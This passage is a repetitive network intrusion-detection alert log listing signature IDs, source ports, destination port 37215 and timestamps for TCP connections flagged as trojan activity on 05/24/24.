              SID:2829579
              Source Port:57724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573869
              SID:2829579
              Source Port:46138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635884
              SID:2829579
              Source Port:47472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572644
              SID:2835222
              Source Port:52256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390592
              SID:2829579
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355186
              SID:2829579
              Source Port:48826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279429
              SID:2829579
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432505
              SID:2829579
              Source Port:32832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518963
              SID:2835222
              Source Port:50614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551858
              SID:2829579
              Source Port:51868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639299
              SID:2829579
              Source Port:44520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547037
              SID:2835222
              Source Port:48274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574062
              SID:2829579
              Source Port:56942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860321
              SID:2835222
              Source Port:36052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308824
              SID:2829579
              Source Port:40378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189056
              SID:2829579
              Source Port:33462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233451
              SID:2829579
              Source Port:57072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395765
              SID:2829579
              Source Port:36530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975307
              SID:2835222
              Source Port:36168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494429
              SID:2829579
              Source Port:48568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638872
              SID:2835222
              Source Port:35350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926892
              SID:2835222
              Source Port:57004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444143
              SID:2835222
              Source Port:44786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110775
              SID:2829579
              Source Port:54846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398457
              SID:2829579
              Source Port:43098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546925
              SID:2835222
              Source Port:52962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574565
              SID:2829579
              Source Port:38670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589143
              SID:2835222
              Source Port:59272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402264
              SID:2829579
              Source Port:51058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167974
              SID:2835222
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920650
              SID:2835222
              Source Port:49224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882435
              SID:2829579
              Source Port:50798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575135
              SID:2835222
              Source Port:33502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487563
              SID:2835222
              Source Port:54656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073198
              SID:2835222
              Source Port:37368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552716
              SID:2829579
              Source Port:41246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333985
              SID:2835222
              Source Port:51426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188402
              SID:2835222
              Source Port:55600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700948
              SID:2835222
              Source Port:49880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727005
              SID:2835222
              Source Port:50008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547429
              SID:2829579
              Source Port:35416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406419
              SID:2829579
              Source Port:57434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103567
              SID:2835222
              Source Port:38398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724772
              SID:2829579
              Source Port:42360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478420
              SID:2829579
              Source Port:56070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.755572
              SID:2829579
              Source Port:41964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768065
              SID:2829579
              Source Port:44138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664734
              SID:2835222
              Source Port:37950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857815
              SID:2829579
              Source Port:33228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.158846
              SID:2835222
              Source Port:35070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519430
              SID:2835222
              Source Port:49182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365339
              SID:2835222
              Source Port:53634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123635
              SID:2829579
              Source Port:42434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280079
              SID:2835222
              Source Port:39190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624806
              SID:2835222
              Source Port:34316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623831
              SID:2835222
              Source Port:33640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456911
              SID:2829579
              Source Port:42454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396774
              SID:2835222
              Source Port:54240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625677
              SID:2829579
              Source Port:37726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108094
              SID:2829579
              Source Port:53396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378052
              SID:2829579
              Source Port:45638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856728
              SID:2829579
              Source Port:55698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232772
              SID:2829579
              Source Port:33310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885186
              SID:2835222
              Source Port:54620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124016
              SID:2829579
              Source Port:45596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458299
              SID:2829579
              Source Port:47454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485497
              SID:2829579
              Source Port:33368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062748
              SID:2835222
              Source Port:54030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099862
              SID:2835222
              Source Port:34494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455334
              SID:2835222
              Source Port:39866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049644
              SID:2835222
              Source Port:33366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477171
              SID:2835222
              Source Port:51384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520172
              SID:2835222
              Source Port:39592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302989
              SID:2835222
              Source Port:38426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203018
              SID:2835222
              Source Port:49768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053866
              SID:2829579
              Source Port:35244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507051
              SID:2835222
              Source Port:35706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695189
              SID:2829579
              Source Port:56540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477135
              SID:2835222
              Source Port:33944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875714
              SID:2829579
              Source Port:57060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866332
              SID:2829579
              Source Port:56206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797617
              SID:2829579
              Source Port:54896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.917876
              SID:2829579
              Source Port:34258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987142
              SID:2829579
              Source Port:58054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595513
              SID:2835222
              Source Port:49604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397257
              SID:2835222
              Source Port:56966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481206
              SID:2835222
              Source Port:50290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278810
              SID:2835222
              Source Port:46270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.772849
              SID:2835222
              Source Port:57062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516760
              SID:2835222
              Source Port:41672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411895
              SID:2835222
              Source Port:51688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990791
              SID:2835222
              Source Port:50928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066243
              SID:2835222
              Source Port:58954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148912
              SID:2829579
              Source Port:43188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395589
              SID:2829579
              Source Port:42304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.795976
              SID:2829579
              Source Port:42784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481681
              SID:2835222
              Source Port:51336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.772722
              SID:2835222
              Source Port:57854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346987
              SID:2829579
              Source Port:34506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459700
              SID:2835222
              Source Port:55972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507145
              SID:2829579
              Source Port:57738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.772882
              SID:2829579
              Source Port:42428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477815
              SID:2829579
              Source Port:57878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503536
              SID:2835222
              Source Port:58672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459700
              SID:2829579
              Source Port:55972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.699534
              SID:2835222
              Source Port:49766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537321
              SID:2835222
              Source Port:35416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517931
              SID:2835222
              Source Port:60730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631368
              SID:2829579
              Source Port:45504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.765004
              SID:2835222
              Source Port:60376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396094
              SID:2829579
              Source Port:43092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394038
              SID:2829579
              Source Port:33140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078767
              SID:2835222
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044850
              SID:2829579
              Source Port:41552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189469
              SID:2829579
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403010
              SID:2829579
              Source Port:45214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554137
              SID:2829579
              Source Port:51060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278205
              SID:2829579
              Source Port:40354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536713
              SID:2829579
              Source Port:39468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608770
              SID:2829579
              Source Port:38248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797317
              SID:2829579
              Source Port:51346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538179
              SID:2835222
              Source Port:54648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.488237
              SID:2835222
              Source Port:58478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486144
              SID:2835222
              Source Port:35800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187051
              SID:2829579
              Source Port:54716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.832424
              SID:2829579
              Source Port:59830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115945
              SID:2835222
              Source Port:42342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725988
              SID:2835222
              Source Port:44636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433778
              SID:2835222
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431351
              SID:2835222
              Source Port:57068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100664
              SID:2835222
              Source Port:48450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279066
              SID:2829579
              Source Port:40468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693130
              SID:2835222
              Source Port:40322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154809
              SID:2829579
              Source Port:57736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428825
              SID:2829579
              Source Port:34020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402296
              SID:2835222
              Source Port:52164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724728
              SID:2835222
              Source Port:42976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546111
              SID:2835222
              Source Port:40210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.874715
              SID:2829579
              Source Port:34418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283014
              SID:2835222
              Source Port:36776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199146
              SID:2829579
              Source Port:49388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202646
              SID:2835222
              Source Port:44714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624849
              SID:2829579
              Source Port:55192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638487
              SID:2829579
              Source Port:44552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525311
              SID:2829579
              Source Port:60226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116020
              SID:2835222
              Source Port:55344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070396
              SID:2835222
              Source Port:58542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878258
              SID:2835222
              Source Port:58120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121532
              SID:2835222
              Source Port:50940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.146926
              SID:2829579
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.537830
              SID:2835222
              Source Port:35712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377295
              SID:2829579
              Source Port:43956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459629
              SID:2835222
              Source Port:40852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290241
              SID:2829579
              Source Port:36496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.076458
              SID:2835222
              Source Port:41260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605758
              SID:2835222
              Source Port:40202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596632
              SID:2835222
              Source Port:59266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235296
              SID:2835222
              Source Port:56640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685342
              SID:2835222
              Source Port:41200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286021
              SID:2829579
              Source Port:43886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801920
              SID:2829579
              Source Port:45784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799188
              SID:2835222
              Source Port:59856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432472
              SID:2835222
              Source Port:42722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516547
              SID:2829579
              Source Port:46358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343622
              SID:2829579
              Source Port:57744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166186
              SID:2835222
              Source Port:42314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534859
              SID:2829579
              Source Port:48576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814876
              SID:2835222
              Source Port:38838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045465
              SID:2829579
              Source Port:34232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345284
              SID:2829579
              Source Port:46058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308785
              SID:2829579
              Source Port:59984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970900
              SID:2835222
              Source Port:43190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077014
              SID:2829579
              Source Port:35244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457913
              SID:2829579
              Source Port:46158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425466
              SID:2835222
              Source Port:37532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063754
              SID:2835222
              Source Port:50880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425498
              SID:2835222
              Source Port:59170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483647
              SID:2835222
              Source Port:44226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544291
              SID:2835222
              Source Port:44510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994230
              SID:2829579
              Source Port:60914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480822
              SID:2835222
              Source Port:55202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445866
              SID:2829579
              Source Port:53364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518586
              SID:2835222
              Source Port:60762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368792
              SID:2835222
              Source Port:43464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062398
              SID:2835222
              Source Port:39790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693427
              SID:2829579
              Source Port:52702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535759
              SID:2835222
              Source Port:44064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149077
              SID:2829579
              Source Port:45658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804684
              SID:2829579
              Source Port:47844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450953
              SID:2829579
              Source Port:43420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456439
              SID:2835222
              Source Port:52794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302940
              SID:2835222
              Source Port:57030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575295
              SID:2829579
              Source Port:45164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116910
              SID:2829579
              Source Port:47992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397799
              SID:2829579
              Source Port:49552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661967
              SID:2835222
              Source Port:51974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448043
              SID:2835222
              Source Port:35924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148662
              SID:2829579
              Source Port:54304
              Destination Port:37215
